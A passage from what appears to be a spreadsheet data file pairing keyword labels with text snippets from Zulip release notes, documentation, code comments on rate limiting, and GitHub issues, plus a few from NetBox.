maintained. reimplementation that also protects against SSRF attacks. This. server now listens only on 127.0.0.1 when it is deployed as part of. a standalone deployment. - Began using camo for images displayed in URL previews. This improves. privacy and also resolves an issue where an image link to a third. party server with an expired or otherwise invalid SSL certificate. would trigger a confusing pop-up window for Zulip Desktop users. - Fixed a bug which could cause Tornado to shut down improperly. (causing an immediate full-page reload for their clients) when. r</t>
  </si>
  <si>
    <t>affecting. the server with a regular expression denial-of-service attack. through linkifier patterns. ### Zulip Server 4.6. _Released 2021-09-23_. - Documented official support for Debian 11 Bullseye, now that it is. officially released by Debian upstream. - Fixed installation on Debian 10 Buster. Upstream infrastructure had. broken the Python `virtualenv` tool on this platform, which we've. worked around for this release. - Zulip releases are now distributed from https://download.zulip.com/server/,. replacing the old `www.zulip.org` server. - Added support for LDAP synchronization of the `is_realm_owner` and. `is_moderator` flags. - `upgrade-zulip-from-git` now uses `git fetch --prune`; this ensures. `upgrade-zulip-from-git master` with return an error rather than. using a stale cached version of the `master` branch, which was. renamed to `main` this month. - Added a new `reset_authentication_attempt_count` management command. to allow sysadmins to manually reset authentication rate limits. - Fixed a bug that caused the `upgrade-postgresql` tool to. incorrectly remove `supervisord` configuration for `process-fts-updates`. - Fixed a rare migration bug when upgrading from Zulip versions 2.1 and older. - Fixed a subtle bug where the left sidebar would show both old and. new names for some topics that had been renamed. - Fixed incoming email gateway support for configurations. with the `http_only` setting enabled. - Fixed issues where Zulip's outgoing webhook, with the. Slack-compatible interface, had a different format from Slack's. documented interface. - The installation and upgrade documentations now show the latest. release's version number. - Backported many improvements to the ReadTheDocs documentation. - Updated translation data from Transifex. ### Zulip Server 4.5. _Released 2021-07-25_. - Added a tool to fix potential database corruption caused by host OS. upgrades (was listed in 4.4 release notes, but accidentally omitted). ### Zulip Server 4.4. _Released 20</t>
  </si>
  <si>
    <t>gzip-compressed</t>
  </si>
  <si>
    <t>ce of messages. - Added setting to always send push notifications. - Added setting to hide private message content in desktop. notifications. - Added buttons to download .zuliprc files. - Added italics and strikethrough support in Markdown implementation. - Added errors for common installations mistakes (e.g., too little RAM). - Added a new /authors page showing the contributors to the current. Zulip version. - Added illustrations to the 404 and 500 pages. - Upgraded all Python dependencies to modern versions, including. Django 1.10 (all of Zulip's patches have been merged into mainline). - Increased backend test coverage of Python codebase to 90%. - Increased mypy static type coverage of Python code to 100%. - Added several new linters (eslint, pep8) and cleaned the codebase. - Optimized the speed of the Zulip upgrade process, especially with Git. - Have peer_add events send user_id, not email. - Fixed problems with RabbitMQ when installing Zulip. - Fixed JavaScript not being gzip-compressed properly. - Fixed a major performance bug in the Tornado service. - Fixed a frontend performance bug creating streams in very large realms. - Fixed numerous bugs where strings were not properly tagged for translation. - Fixed several real-time sync bugs, and removed several AJAX calls. Zulip should be more performant than ever before. - Fixed Zulip Tornado service not working with http_proxy set in environment. - Fixed text overflow in stream subscriptions. - Fixed CSS issues with message topic editing. - Fixed several transactionality bugs (e.g., in Huddle creation). - Fixed missed-message email configuration error handling. - Fixed annoying @-mentions in Jira integration. - Fixed various mismatches between frontend and backend Markdown. implementations. - Fixed various popover-related UI bugs. - Fixed duplicate notifications with multiple open Zulip tabs. - Fixed support for emailing the server administrator about backend exceptions. - Cleaned up the "edit message" form. - El</t>
  </si>
  <si>
    <t>o_domain, even. if that setting was disabled for the realm. - Fixed bugs changing certain settings in administration pages. - Fixed collapsing messages in narrowed views. - Fixed 500 errors when uploading a non-image file as an avatar. - Fixed Jira integration incorrectly not @-mentioning assignee. ### Zulip Server 1.3.10. _Released 2016-01-21_. - Added new integration for Travis CI. - Added settings option to control maximum file upload size. - Added support for running Zulip development environment in Docker. - Added easy configuration support for a remote PostgreSQL database. - Added extensive documentation on scalability, backups, and security. - Recent private message threads are now displayed expanded similar to. the pre-existing "Recent topics" feature. - Made it possible to set LDAP and EMAIL_HOST passwords in. /etc/zulip/secrets.conf. - Improved the styling for the Administration page and added tabs. - Substantially improved loading performance on slow networks by enabling. gzip compression on more assets. - Changed the page title in narrowed views to include the current narrow. - Fixed several backend performance issues affecting very large realms. - Fixed bugs where draft compose content might be lost when reloading site. - Fixed support for disabling the "zulip" notifications stream. - Fixed missing step in postfix_localmail installation instructions. - Fixed several bugs/inconveniences in the production upgrade process. - Fixed realm restrictions for servers with a unique, open realm. - Substantially cleaned up console logging from run-dev. ### Zulip Server 1.3.9. _Released 2015-11-16_. - Fixed buggy #! lines in upgrade scripts. ### Zulip Server 1.3.8. _Released 2015-11-15_. - Added options to the Python API for working with untrusted server certificates. - Added a lot of documentation on the development environment and testing. - Added partial support for translating the Zulip UI. - Migrated installing Node dependencies to use npm. - Fixed LDAP integra</t>
  </si>
  <si>
    <t xml:space="preserve"> performance. save "". ```. People often wonder if we could replace memcached with Redis (or. replace RabbitMQ with Redis, with some loss of functionality). The answer is likely yes, but it wouldn't improve Zulip. Operationally, our current setup is likely easier to develop and run. in production than a pure Redis system would be. Meanwhile, the. perceived benefit for using Redis is usually to reduce memory. consumption by running fewer services, and no such benefit would. materialize:. - Our cache uses significant memory, but that memory usage would be. essentially the same with Redis as it is with memcached. - All of these services have low minimum memory requirements, and in. fact our applications for Redis and RabbitMQ do not use significant. memory even at scale. - We would likely need to run multiple Redis services (with different. configurations) in order to ensure the pure LRU use case (memcached). doesn't push out data that we want to persist until expiry. (Redis-based rate limiting) or until consumed (RabbitMQ-based. queuing of deferred work). ### RabbitMQ. RabbitMQ is a queueing system. Its config files live in. `puppet/zulip/files/rabbitmq`. Initial configuration happens in. `scripts/setup/configure-rabbitmq`. We use RabbitMQ for queuing expensive work (e.g., sending emails. triggered by a message, push notifications, some analytics, etc.) that. require reliable delivery but which we don't want to do on the main. thread. It's also used for communication between the application server. and the Tornado push system. Two simple wrappers around `pika` (the Python RabbitMQ client) are in. `zerver/lib/queue.py`. There's an asynchronous client for use in. Tornado and a more general client for use elsewhere. Most of the. processes started by Supervisor are queue processors that continually. pull things out of a RabbitMQ queue and handle them; they are defined. in `zerver/worker/`. Also see [the queuing guide](../subsystems/queuing.md). ### PostgreSQL. PostgreSQL </t>
  </si>
  <si>
    <t>Zulip’s security strategy covers all aspects of our product and. business. Making sure your information stays protected is our highest. priority. ## Security basics. - All Zulip clients (web, mobile, desktop, terminal, and integrations). require TLS encryption and authentication over HTTPS for all data. transmission between clients and the server, both on LAN and the Internet. - All Zulip Cloud customer data is encrypted at rest. Self-hosted Zulip can be. configured for encryption at rest via your hosting provider, or by setting up. hardware and software disk encryption of the database and other data storage. media. - Zulip’s on-premise offerings can be hosted entirely behind your firewall,. or even on an air-gapped network (disconnected from the Internet). - Every Zulip authenticated API endpoint has built in rate limiting to. prevent DoS attacks. - Connections from the Zulip servers to Active Directory/LDAP can be secured. with TLS. If Zulip is. [deployed on multiple servers](https://zulip.readthedocs.io/en/latest/production/deployment.html),. all connections between parts of the Zulip infrastructure can be secured. with TLS or SSH. - Message content can be. [excluded from mobile push notifications][redact-content],. to avoid displaying message content on locked mobile screens, and to. comply with strict compliance policies such as the USA’s HIPAA standards. - Zulip operates a HackerOne disclosure program to reward hackers for. finding and responsibly reporting security vulnerabilities in Zulip. Our. [completely open source codebase](https://github.com/zulip/zulip) means. that HackerOne’s white-hat hackers can audit Zulip for potential security. issues with full access to the source code. [redact-content]: https://zulip.readthedocs.io/en/latest/production/mobile-push-notifications.html#security-and-privacy. ## Configurable access control policies. - Zulip supports [direct messages](/help/direct-messages) (to one or more. individuals), [private channels](/help/chan</t>
  </si>
  <si>
    <t>g, but not limited to, all intellectual property, data, privacy, and. export control laws and regulations promulgated by any government agencies,. including, but not limited to, the U.S. Securities and Exchange Commission,. and any rules of any national and other securities exchanges, are prohibited. ## Security. - **Do not attempt to compromise the security of other users of the Services,**. such as attempting to obtain the password or other security information of any. other user, or to gain access to their account**.**. - **Do not attempt to compromise the security of the Services themselves.** This. includes violating the security of any computer network or system, cracking. any passwords or encrypted communications, or compromising, breaking, or. circumventing any of the technical processes or security measures associated. with the Services. Do not attempt to test for vulnerabilities in our systems. or networks without explicit prior consent. - **Do not exceed or circumvent rate limits,** run automated processes that. interfere with the proper working of the Services, place an unreasonable load. on the Services’ infrastructure, or otherwise cause excess or abusive usage. - **Do not permit any third party to access your account** or the authentication. credentials you use to access the Services. This includes selling, reselling,. sublicensing, or time-sharing Zulip accounts. - **Do not share viruses or malware**, or attempt to hack, phish, or DDoS. others. - **Do not automatically create or access accounts** for the Services (a.k.a. “scraping”) by means other than our publicly supported interfaces. If you wish. to embed Zulip as the chat backend for your own product, you must self-host. your own Zulip server, rather than using Zulip Cloud. ## Spam and deception. - **Do not send spam**, including unsolicited communications, promotions, or. advertisements. - **Do not target other accounts with notification spam** by mentioning someone. or sending them direct messa</t>
  </si>
  <si>
    <t>groups. Guest users. Limit user list access for guests. Advanced administration. Private channels with shared history. Private channels with private history. Channel posting permissions. Direct messaging permissions. . Permissions for. . editing. ,. . deleting. . and moving messages. . Customize permissions by channel. . Manage permissions by user role. . Manage permissions with user groups. . Grant permissions to individual users. . Configure initial settings for new users. . Configure initial channels for new users. . Public access option. Advanced moderation tools. Usage statistics charts. Custom branding. Custom domain. Security. 100% open-source, auditable codebase. Restricted email domains. . Custom password strength requirement. . TLS encryption. . Custom SSL certificate authority. Custom TLS server termination. Firewalled hosting. . Air-gapped hosting. Data encryption at rest. No-content push notifications. . Revoke and reset any user's credentials. . API endpoint access rate limits. . Compliance. Message editing and deletion policies. . Complete data exports. Granular data retention policies. Detailed audit log of administrative actions. . Compliance exports. . GDPR compliant. HIPAA compliant. Compliance customization and support. Please inquire. Please inquire. Billed hourly. Billed hourly. Deployment options. Multiple organizations on one server. Maintain a local fork. Keep custom code across upgrades. Comprehensive data backups and restores. Real-time data backup and replication. Off-server attachment storage. NAS, S3, etc. Outgoing proxy. Docker deployments. Kubernetes deployments with Helm. Scalability for thousands of concurrent users. Deploy supporting services on separate hosts. Disaster recovery failover. Monitoring and alerting. Sentry integration for error reporting. Support. Comprehensive documentation for users, administrators and server administrators. Chat support in the. Zulip development community. Feature feedback sessions. Chat only. Emai</t>
  </si>
  <si>
    <t>{% extends "zerver/portico_error_pages/portico_error_page.html" %}. {% block title %}. {{ _("Rate limit exceeded") }} | Zulip. {% endblock %}. {% block error_page_content %}. {{ _("Rate limit exceeded.") }}. {% trans %}Your server has exceeded the limit for how. often this action can be performed.{% endtrans %}. {% trans %}You can try again in {{retry_after}} seconds.{% endtrans %}. . {% endblock %}.</t>
  </si>
  <si>
    <t>{% extends "zerver/portico_error_pages/portico_error_page.html" %}. {% block title %}. {{ _("Rate limit exceeded") }} | Zulip. {% endblock %}. {% block error_page_content %}. {{ _("Rate limit exceeded.") }}. {% trans %}You have exceeded the limit for how. often a user can perform this action.{% endtrans %}. {% trans %}You can try again in {{retry_after}} seconds.{% endtrans %}. . {% endblock %}.</t>
  </si>
  <si>
    <t>Return rate limit errors early, since they occur in rate limiting tests that want to verify them.</t>
  </si>
  <si>
    <t>code_comment</t>
  </si>
  <si>
    <t>Remove extra mobile user/push data and set created date For remote realm row, remove server push data and created date; for remote server row, remove realm push data and created date.</t>
  </si>
  <si>
    <t>e cookies (enabled by default) COOKIES_ENABLED = False Disable Telnet Console (enabled by default) TELNETCONSOLE_ENABLED = False Override the default request headers: DEFAULT_REQUEST_HEADERS = { Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', Accept-Language': 'en', } Enable or disable spider middlewares See https://docs.scrapy.org/en/latest/topics/spider-middleware.html SPIDER_MIDDLEWARES = { documentation_crawler.middlewares.DocumentationCrawlerSpiderMiddleware': 543, } Enable or disable downloader middlewares See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html DOWNLOADER_MIDDLEWARES = { documentation_crawler.middlewares.DocumentationCrawlerDownloaderMiddleware': 543, } Enable or disable extensions See https://docs.scrapy.org/en/latest/topics/extensions.html EXTENSIONS = { scrapy.extensions.telnet.TelnetConsole': None, } Configure item pipelines See https://docs.scrapy.org/en/latest/topics/item-pipeline.html ITEM_PIPELINES = { documentation_crawler.pipelines.DocumentationCrawlerPipeline': 300, } Enable and configure the AutoThrottle extension (disabled by default) See https://docs.scrapy.org/en/latest/topics/autothrottle.html AUTOTHROTTLE_ENABLED = True The initial download delay AUTOTHROTTLE_START_DELAY = 5 The maximum download delay to be set in case of high latencies AUTOTHROTTLE_MAX_DELAY = 60 The average number of requests Scrapy should be sending in parallel to each remote server AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0 Enable showing throttling stats for every response received: AUTOTHROTTLE_DEBUG = False Enable and configure HTTP caching (disabled by default) See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings HTTPCACHE_ENABLED = True HTTPCACHE_EXPIRATION_SECS = 0 HTTPCACHE_DIR = 'httpcache HTTPCACHE_IGNORE_HTTP_CODES = [] HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage Set settings whose default value is deprecated to a future-proof value</t>
  </si>
  <si>
    <t>We want to check these links but due to rate limiting from GitHub, these checks often fail in the CI. Thus, we should treat these as external links for now. TODO: Figure out how to test github.com/zulip links in CI.</t>
  </si>
  <si>
    <t>This rate limit being hit means we've either set the limits too low for legitimate use, or the endpoint is being spammed. Ideally, we want this endpoint to always be operational so this deserves logging a warning.</t>
  </si>
  <si>
    <t>server pushes</t>
  </si>
  <si>
    <t>Truncate incoming pushes to 200, due to APNs maximum message sizes; see handle_remove_push_notification for the version of this for notifications generated natively on the server. We apply this to remote-server pushes in case they predate that commit.</t>
  </si>
  <si>
    <t>Now the rate limit is hit.</t>
  </si>
  <si>
    <t>Verify rate limiting was attempted.</t>
  </si>
  <si>
    <t>We need to recreate the request, because process_client mutates client on the associated RequestNotes, causing the request to be incorrectly rate limited, since should_rate_limit checks the client to determine if rate limiting should be skipped.</t>
  </si>
  <si>
    <t>Rate limiting is skipped for internal clients with an external address when DEBUG_RATE_LIMITING is True.</t>
  </si>
  <si>
    <t>We're not making a correct request here, but rate-limiting is supposed to happen before the request fails due to not being correctly made. Thus we expect either an 400 error if the request is allowed by the rate limiter, or 429 if we're above the limit. We don't expect to see other status codes here, so we assert for safety.</t>
  </si>
  <si>
    <t>Now we'll be making requests to another subdomain, so we need to logout to avoid polluting the session in the test environment by still being logged in.</t>
  </si>
  <si>
    <t>Simulate a rate limit hit on every third request.</t>
  </si>
  <si>
    <t>Deny file access since rate limited</t>
  </si>
  <si>
    <t>A correct login attempt should reset the rate limits for this user profile, so the next two attempts shouldn't get limited:</t>
  </si>
  <si>
    <t>Reset the rate limit for authentication attempts for username.</t>
  </si>
  <si>
    <t>Checks Redis to make sure our rate limiting system hasn't grown a bug and left Redis with a bunch of data Usage: ./manage.py [--trim] check_redis</t>
  </si>
  <si>
    <t>API rate limits, formatted as a comma-separated list of range:max pairs</t>
  </si>
  <si>
    <t>Reactivate the account to avoid polluting other tests.</t>
  </si>
  <si>
    <t>This module is a collection of testing helpers for validating the schema of "events" sent by Zulip's server-to-client push system. By policy, every event generated by Zulip's API should be validated by a test in test_events.py with a schema checker here. See https://zulip.readthedocs.io/en/latest/subsystems/events-system.html</t>
  </si>
  <si>
    <t>This request uses standard API based authentication. For override_api_url_scheme views, we skip our normal rate limiting, because there are good reasons clients might need to (e.g.) request a large number of uploaded files or avatars in quick succession.</t>
  </si>
  <si>
    <t>Abort this request if the user is over their rate limits</t>
  </si>
  <si>
    <t>Returns the API rate limit for the highest limit</t>
  </si>
  <si>
    <t>rate limit requests</t>
  </si>
  <si>
    <t>Don't rate limit requests from Django that come from our own servers, and don't rate-limit dev instances</t>
  </si>
  <si>
    <t>Returns whether or not a user was rate limited. Will raise a RateLimitedError exception if the user has been rate limited, otherwise returns and modifies request to contain the rate limit information</t>
  </si>
  <si>
    <t>Temporarily add a rate-limiting rule to the rate limiter</t>
  </si>
  <si>
    <t>avoid pollution</t>
  </si>
  <si>
    <t>The default Django TestCase wraps each test in a transaction. This is invaluable for being able to rollback the transaction and thus efficiently do many tests containing database changes, but it prevents testing certain transaction-related races and locking bugs. This test class is intended to be used (sparingly!) for tests that need to verify transaction related behavior, like locking with select_for_update or transaction.atomic(durable=True). Unlike ZulipTestCase, ZulipTransactionTestCase has the following traits: 1. Does not offer isolation between tests by wrapping them inside an atomic transaction. 2. Changes are committed to the current worker's test database, so side effects carry on. All ZulipTransactionTestCase tests must be carefully written to avoid side effects on the database; while Django runs TransactionTestCase after all normal TestCase tests on a given test worker to avoid pollution, they can break other ZulipTransactionTestCase tests if they leak state.</t>
  </si>
  <si>
    <t>Email mirror rate limiter code:</t>
  </si>
  <si>
    <t>RATE LIMITING</t>
  </si>
  <si>
    <t>REDIS-BASED RATE LIMITING CONFIGURATION Merge any local overrides with the default rules.</t>
  </si>
  <si>
    <t>List of domains that, when applied to a request in a Tornado process, will be handled with the separate in-memory rate limiting backend for Tornado, which has its own buckets separate from the default backend. In principle, it should be impossible to make requests to tornado that fall into other domains, but we use this list as an extra precaution.</t>
  </si>
  <si>
    <t>Twitter API credentials Secrecy not required because its only used for R/O requests. Please don't make us go over our rate limit.</t>
  </si>
  <si>
    <t>Limits total number of API requests per unit time by each user. Rate limiting general API access protects the server against clients causing unreasonable server load.</t>
  </si>
  <si>
    <t>Rate limits for endpoints which have absolute limits on how much they can be used in a given time period. These will be extremely rare, and most likely for zilencer endpoints only, so we don't need a nice overriding system for them like we do for RATE_LIMITING_RULES.</t>
  </si>
  <si>
    <t>Controls various features explaining Zulip to new users. Disabling this is only recommended for installations that are using a limited subset of the Zulip UI, such as embedding it in a larger app. TUTORIAL_ENABLED = True Controls whether Zulip will rate-limit user requests. RATE_LIMITING = True Entries in this dictionary will override Zulip's default rate limits. Rules which are not explicitly overridden here will be as default. View the current rules using: home/zulip/deployments/current/scripts/get-django-setting RATE_LIMITING_RULES The limits are tuples of a number of seconds and a number of requests allowed over that many seconds. If multiple tuples are given in a rule, a request breaching any of them will trigger a rate-limited response to the client. For example, to change the limits for total API requests by each user to be at most 100 requests per minute, and at most 200 requests per hour, add: api_by_user": [(60, 100), (3600, 200)], RATE_LIMITING_RULES = { api_by_ip": [ (60, 100), ], } Fetch TOR exit node list every hour, and group all TOR exit nodes together into one bucket when applying rate-limiting. RATE_LIMIT_TOR_TOGETHER = False Configuration for Terms of Service and Privacy Policy for the server. If unset, Zulip will never prompt users to accept Terms of Service. Users will be prompted to accept the terms during account registration, and during login if this value has changed. TERMS_OF_SERVICE_VERSION = "1.0 Directory containing Markdown files for the server's policies. POLICIES_DIRECTORY = "/etc/zulip/policies URL of the navigation tour video to show to new users. You can use this to host the official video on your network, or to provide your own introductory video with details on how your organization uses Zulip. A value of None disables the navigation tour video experience. NAVIGATION_TOUR_VIDEO_URL = "https://static.zulipchat.com/static/navigation-tour-video/zulip-10.mp4</t>
  </si>
  <si>
    <t>Apply rate limiting. If this request is above the limit, RateLimitedError will be raised, interrupting the authentication process. From there, the code calling authenticate() can either catch the exception and handle it on its own, or it will be processed by RateLimitMiddleware.</t>
  </si>
  <si>
    <t>deflated</t>
  </si>
  <si>
    <t>encoded_saml_message is the base64-encoded XML string that's received in the SAMLRequest or SAMLResponse params. The underlying XML can be either deflated or not, both cases should be handled fine by the class. backend is an instance of the SAMLAuthBackend class, which is handling the HTTP request in which the SAMLRequest or SAMLResponse was delivered.</t>
  </si>
  <si>
    <t>Rate limiting stats Used to limit the number of invitation emails sent by a realm. Included in LOGGING_COUNT_STAT_PROPERTIES_NOT_SENT_TO_BOUNCER.</t>
  </si>
  <si>
    <t>LoggingCountStats with a daily duration and that are directly stored on the RealmCount table (instead of via aggregation in process_count_stat), can be in a state, after the hourly cron job to update analytics counts, where the logged value will be live-updated later (as the end time for the stat is still in the future). As these logging counts are designed to be used on the self-hosted installation for either debugging or rate limiting, sending these incomplete counts to the bouncer has low value.</t>
  </si>
  <si>
    <t>GZipMiddleware</t>
  </si>
  <si>
    <t>adapted from Starlette's GZipMiddleware Starlette does not work with Django's case-sensitive headers</t>
  </si>
  <si>
    <t>GZip</t>
  </si>
  <si>
    <t>Don't apply GZip to small outgoing responses.</t>
  </si>
  <si>
    <t>Due to throttling, login with invalid credentials leads to block next attempt, by adding specific entry to cache. We should delete it here to unblock logining.</t>
  </si>
  <si>
    <t>GzipFile</t>
  </si>
  <si>
    <t>when Create GzipFile object with BytesIO buffer and close it to free resources.</t>
  </si>
  <si>
    <t>Patch Update</t>
  </si>
  <si>
    <t>To contribute to the NetBox UI, you'll need to review the main [Getting Started guide](getting-started.md) in order to set up your base environment. ### Tools. Once you have a working NetBox development environment, you'll need to install a few more tools to work with the NetBox UI:. - [NodeJS](https://nodejs.org/en/download/) (the LTS release should suffice). - [Yarn](https://yarnpkg.com/getting-started/install) (version 1). After Node and Yarn are installed on your system, you'll need to install all the NetBox UI dependencies:. ```console. $ cd netbox/project-static. $ yarn. ```. !!! warning "Check Your Working Directory". You need to be in the `netbox/project-static` directory to run the below `yarn` commands. ### Updating Dependencies. Run `yarn outdated` to identify outdated dependencies. ```. $ yarn outdated. yarn outdated v1.22.19. info Color legend :. "&lt;red&gt;" : Major Update backward-incompatible updates. "&lt;yellow&gt;" : Minor Update backward-compatible features. "&lt;green&gt;" : Patch Update backward-compatible bug fixes. Package Current Wanted Latest Workspace Package Type URL. bootstrap 5.3.1 5.3.1 5.3.3 netbox dependencies https://getbootstrap.com/. ```. Run `yarn upgrade --latest` to automatically upgrade these packages to their most recent versions. ```. $ yarn upgrade bootstrap --latest. yarn upgrade v1.22.19. [1/4] Resolving packages... [2/4] Fetching packages... [3/4] Linking dependencies... [4/4] Rebuilding all packages... success Saved lockfile. success Saved 1 new dependency. info Direct dependencies. └─ bootstrap@5.3.3. info All dependencies. └─ bootstrap@5.3.3. Done in 0.95s. ```. `package.json` will be updated to reflect the new package versions automatically. ### Bundling. In order for the TypeScript and Sass (SCSS) source files to be usable by a browser, they must first be transpiled (TypeScript → JavaScript, Sass → CSS), bundled, and minified. After making changes to TypeScript or Sass source files, run `yarn bundle`. `yarn bundle` is a wrapper arou</t>
  </si>
  <si>
    <t>The element represented by the motion state. This is an empty reference when we create the state to support SSR and allow for later mounting in view libraries. @ts-ignore</t>
  </si>
  <si>
    <t>slow updates</t>
  </si>
  <si>
    <t>Disable brace matching in long lines, since it'll cause hugely slow updates</t>
  </si>
  <si>
    <t>lower resolution</t>
  </si>
  <si>
    <t>hmm, yeah, I see the issue with lower resolution monitors. We should either offer this as an option or maybe change the existing option to work that way instead.</t>
  </si>
  <si>
    <t>below the fold</t>
  </si>
  <si>
    <t>I think we want a more direct UI to see subscribers. Currently, you have to know to go to settings, and then when you get there, it's below the fold if you have a short screen, and there's tons of clutter. This may not be actionable right away, though, since I think we're trying to clean up the streams UI in other efforts, so we might want to see how those changes turn out.</t>
  </si>
  <si>
    <t>I think allowing "0" as the waiting period is kind of funny, but I'm not sure the alternative of preventing it or telling folks to just "Everyone" is better, plus it's probably mostly an edge case, and it's technically valid. It's also kind of awkward to use this settings UI on a small screen, as the "Save" button easily falls below the fold, and the success/error messages go above the fold. But that precedes this PR. Other than the two observations above, this looks great, so I'm **merging**. For the "0" problem we'll see if we get feedback. For the save/feedback things, I don't have anything actionable, but it's kind of a known problem. Thanks @YJDave @rishig! .</t>
  </si>
  <si>
    <t>Optimize images</t>
  </si>
  <si>
    <t>@akashnimare Thanks for the feedback. I'll try to communicate better going forward. I actually did notice the hover state but I'm referring specifically to the fact that the hover state is not 'enabled' by default on the first option. This is pretty standard when designing any kind of buttons. The one thats selected has an 'enabled' state different from their default 'unselected' state. This is especially useful in a tab menu that blends into the page as it does here so people know that they can click on it without having to move their mouse and happen to hover over the icons to discover this. Regarding the images I think we have 2 options here –. 1) Preload all images onto the page using a preloader ( many available online ). 2) Optimize images to load faster</t>
  </si>
  <si>
    <t>So, the problem with our settings pages in particular, is that with certain screen heights where the bottom of the window doesn't partially occlude text, it can be very not obvious that there's additional settings "below the fold". So having a default-on scrollbar here was intended as a temporary solution to that problem until we can figure out some other way to make the visual design make that clear.</t>
  </si>
  <si>
    <t>lower resolutions</t>
  </si>
  <si>
    <t>. ![pop14](https://user-images.githubusercontent.com/41019632/62797124-67413e80-baca-11e9-9bc9-be6584538940.png). @vinitS101 I have come up with a fix which works till ~300 px. I think it is safe to ignore further lower resolutions. At resolutions lower than 320px,even page CSS begins to falter. comment: I don't know why the other two icons (star and edit message) aren't visible in the screenshot, but they are present. Checked this afterward.</t>
  </si>
  <si>
    <t>responsive images</t>
  </si>
  <si>
    <t>These images were intentionally large for the benefit of retina displays. We may be able to serve them as [responsive images](https://developer.mozilla.org/en-US/docs/Learn/HTML/Multimedia_and_embedding/Responsive_images) but that’s a bit more work.</t>
  </si>
  <si>
    <t>disables animations</t>
  </si>
  <si>
    <t>The emoji version of this concept seems like a totally reasonable feature. There are a few things we'd need to figure out before it could be implemented. . * What are the options? I think we might want 3-options: "Always, Never, On hover" for whether to animate emoji? (I can see "on hover" being annoying if you really never want to see them). * Does this control animated GIFs as well as emoji, or is that a separate setting? . Also, there's the question of how do we control the behavior. From a bit of research, it looks like there are a few ways to implement this sort of thing:. * Ideally, we can just set a CSS rules with a selector like `body.disable-emoji-animations .emoji` that disables animations. * Apparently, can thumbnail static versions of animated emoji image files, and determine which file to serve/access based on the user's setting. . * There are libraries like https://github.com/ctrl-freaks/freezeframe.js/ that use HTML canvas. There's a risk of this having performance issues if it's not implemented in an efficient way and one has 50+ emoji on screen. I think the easiest way for someone outside the project to help is with answering those questions.</t>
  </si>
  <si>
    <t>Only show NAPALM related tabs when applicable; ### NetBox version. v2.10.5. ### Feature type. Change to existing functionality. ### Proposed functionality. I'd like to propose only showing the `Status`, `LLDP Neighbors`, and `Configuration` tabs on devices that meet the criteria for NAPALM integration. As it is, these tabs always show up regardless of what type of device it is. NAPALM is only for networking devices and yet Netbox does not account for this. It would make more sense if these tabs only appeared for eligible devices, similar to how `Interfaces`, `Power ports` and `Power outlets` tabs only appear for devices of which they are configured. ### Use case. It would benefit Netbox users via the following:. - Take up less space on the screen for those with lower resolutions. - Have less chance for confusing users that have no idea what NAPALM is. - It makes sense for it to be removed as a lot of users will never make use of this feature. I'm sure more users could add to the list of benefits. ### Database changes. _No response_. ### External dependencies. _No response_. A discussion has been opened up on the matter [here](https://github.com/netbox-community/netbox/discussions/6025#discussioncomment-529561).</t>
  </si>
  <si>
    <t>Defer loading</t>
  </si>
  <si>
    <t>Release v3.1.3;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</si>
  <si>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Optimized images</t>
  </si>
  <si>
    <t>Optimized images; Issue - Page performance. Page affected - localhost:9991/hello/ and https://www.zulip.org. We were using some heavy png images which were making the page slow. I have tried to optimize(total reduced size ~1100kb) all those images so that performance and load time can be improved.</t>
  </si>
  <si>
    <t>Defer loading zxcvbn; Defer loading zxcvbn.js until we actually need it. Greys out the password strength bar until the zxcvbn is loaded. Fixes https://github.com/zulip/zulip/issues/263.</t>
  </si>
  <si>
    <t>Make user notifications settings take effect immediately; From https://chat.zulip.org/#narrow/stream/frontend/topic/notification.20settings :. &gt; Steve: When I tried to change my notifications settings recently, I unclicked a few things and assumed they took effect immediately, similar to how subscribe/unsubscribe checkmarks work. Unbeknownst to me, the "submit" button was below the fold, and I was able to exit the settings without page without any warning. &gt; Tim: Arguably we should just make notification settings work like the other settings checkboxes. &gt; Steve: I'd be happy with that. I think they're all basically independent enough that you don't need an "atomic" submit.</t>
  </si>
  <si>
    <t>docs: Improve navigation in our expanding developer documentation; From @gnprice's comment in https://github.com/zulip/zulip/pull/5247#discussion_r120453159: . The left nav of our ReadTheDocs is getting really long. This is particularly unfortunate when using the left nav to browse sections that appear there below the fold -- when you get to the page, the part of the nav that you were just using disappears and you have to scroll down to get back to it (though this could probably be fixed with some better javascript?). One possible solution is another layer of collapsing detailed sections when not inside them -- e.g., "Code Testing" would just appear as one item in the left nav unless you're inside "Code Testing". Might motivate a bit of a round of tidying up the overall organization to ensure sections are still findable when their individual titles no longer appear on the nav. Fixing this may be fairly involved, in that we're currently using the default sphinx theme for our developer documentation, and I'm not sure that theme supports what we want here. While we're at it, it'd be nice to be able to put the sub-documents on translating for speciifc languages under the main translating guide.</t>
  </si>
  <si>
    <t>disable animations</t>
  </si>
  <si>
    <t>Toggle emoji animations; Our community is testing out Zulip as a replacement for Slack, but we've got something of a dealbreaker for some folks. In particular, there's no option to disable animations. The specific case regards animated emojis, but I imagine for accessibility reasons it might be useful to also be able to toggle UI animations in general. I'm happy to help/recruit people to help if this is nontrivial.</t>
  </si>
  <si>
    <t>Defer rendering</t>
  </si>
  <si>
    <t>Defer rendering last_edit_timestr until actually hovering over a message; At present, we have logic that computes the `last_edit_timestr` to display as a Tippy tooltip when hovering over a message date element:. ```. $ cat web/templates/edited_notice.hbs. {{#if msg/local_edit_timestamp}}. &lt;div class="message_edit_notice" data-tippy-content="{{t 'Last edited {last_edit_timestr}.' }}"&gt;. {{t "SAVING" }}. &lt;/div&gt;. {{else if moved}}. &lt;div class="message_edit_notice" data-tippy-content="{{t 'Last moved {last_edit_timestr}.' }}"&gt;. {{t "MOVED" }}. &lt;/div&gt;. {{else}}. &lt;div class="message_edit_notice" data-tippy-content="{{t 'Last edited {last_edit_timestr}.' }}"&gt;. {{t "EDITED" }}. &lt;/div&gt;. {{/if}}. ```. When rendering a message feed containing a lot of messages that have been moved, computing all these localized time renderings in a loop is expensive. We should start deferring that work to when the user actually hovers it. We already have a function that is called on such a hover that could be extended to call `_get_msg_timestring` on the message object after looking it up in the message list data structure. ```. message_list_tooltip(".message_edit_notice", { . trigger: "mouseenter", . delay: LONG_HOVER_DELAY, . popperOptions: { . modifiers: [ . { . name: "flip", . options: { . fallbackPlacements: "bottom", . }, . }, . ], . }, . onShow(instance) { . const 